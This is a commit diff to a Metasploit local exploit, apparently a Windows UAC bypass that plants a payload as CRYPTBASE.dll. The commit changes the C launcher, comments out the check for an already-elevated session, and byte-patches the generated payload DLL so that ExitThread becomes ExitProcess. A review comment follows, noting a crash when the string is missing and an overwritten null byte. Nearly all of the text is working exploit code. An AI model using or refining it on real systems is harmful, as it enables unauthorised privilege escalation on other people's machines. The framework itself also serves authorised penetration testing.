Use ExitProcess
parent
cf12826d2c
commit
dc0f2b7291
Binary file not shown.
Binary file not shown.
|
@ -85,8 +85,6 @@ void exploit()
|
||||||
Wow64DisableWow64FsRedirection(&OldValue);
|
Wow64DisableWow64FsRedirection(&OldValue);
|
||||||
if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
|
if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
|
||||||
{
|
{
|
||||||
WaitForSingleObject(shinfo.hProcess, 200);
|
|
||||||
TerminateProcess(shinfo.hProcess, 0); // Even better if the template payload.dll calls ExitProcess
|
|
||||||
CloseHandle(shinfo.hProcess);
|
CloseHandle(shinfo.hProcess);
|
||||||
}
|
}
|
||||||
Wow64RevertWow64FsRedirection(OldValue);
|
Wow64RevertWow64FsRedirection(OldValue);
|
||||||
|
|
|
@ -1,8 +1,6 @@
|
||||||
##
|
##
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
# Framework web site for more information on licensing and terms of use.
|
|
||||||
# http://metasploit.com/framework/
|
|
||||||
##
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
@ -64,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
|
#fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
|
||||||
|
|
||||||
#
|
#
|
||||||
# Verify use against Vista+
|
# Verify use against Vista+
|
||||||
|
@ -154,6 +152,11 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
# Generate payload and random names for upload
|
# Generate payload and random names for upload
|
||||||
#
|
#
|
||||||
payload = generate_payload_dll
|
payload = generate_payload_dll
|
||||||
|
# Change ExitThread to ExitProcess ...
|
||||||
|
exit_thread = "\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00"
|
||||||
|
exit_process = "\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73"
|
||||||
|
index = payload.index(exit_thread)
|
||||||
|
payload[index,exit_process.length] = exit_process
|
||||||
payload_filepath = "#{tmpdir}\\CRYPTBASE.dll"
|
payload_filepath = "#{tmpdir}\\CRYPTBASE.dll"
|
||||||
|
|
||||||
print_status("Uploading the Payload DLL to the filesystem...")
|
print_status("Uploading the Payload DLL to the filesystem...")
|
||||||
|
|
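Review bot: `payload.index(exit_thread)` returns `nil` when that byte string is not present in the generated DLL, and the following `payload[index,exit_process.length] = exit_process` then raises a `TypeError` instead of a clear failure. A guard right after the lookup, e.g. `fail_with(Exploit::Failure::Unknown, 'ExitThread not found in payload DLL') unless index`, would make that case explicit. The 11-byte replacement also overwrites the trailing `\x00` of the matched name, so the patched string stays terminated only if the next byte is already zero; a comment stating that assumption would help the next reader. Separately, the hunk at `def exploit` comments out the `is_admin? or is_system?` check, which the commit title does not mention and which looks like a debugging leftover.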